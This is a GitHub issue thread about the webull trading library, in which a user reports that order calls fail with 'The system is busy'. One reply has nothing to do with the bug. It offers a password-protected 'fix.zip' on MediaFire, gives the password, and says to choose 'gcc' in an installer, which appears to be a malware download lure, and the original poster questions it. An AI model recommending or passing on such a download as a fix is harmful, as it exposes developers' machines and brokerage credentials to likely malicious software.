### ISSUE TITLE
Place order failure - Receiving "The system is busy" from the API

### ISSUE THREAD

**Issue by nirmalc83** [tedchou12/webull#438]
The last few days, order execution is failing for both stocks and options. Has the API url changed for trading? I checked the network tab and the url seemed different, but wasnt sure if I should change it in the endpoints.

wb.place_option_order(tickerId = 1047329746, action='BUY', orderType='LMT', enforce = 'GTC', quant =2, lmtPrice=2.0)
Result: "place_option_order failed." msg in the response: "The system is busy"

**Comment by sunshinezxq** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by nirmalc83** [comment]
> Download https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file password: changeme In the installer menu, select "gcc."

Sorry, what is this for?
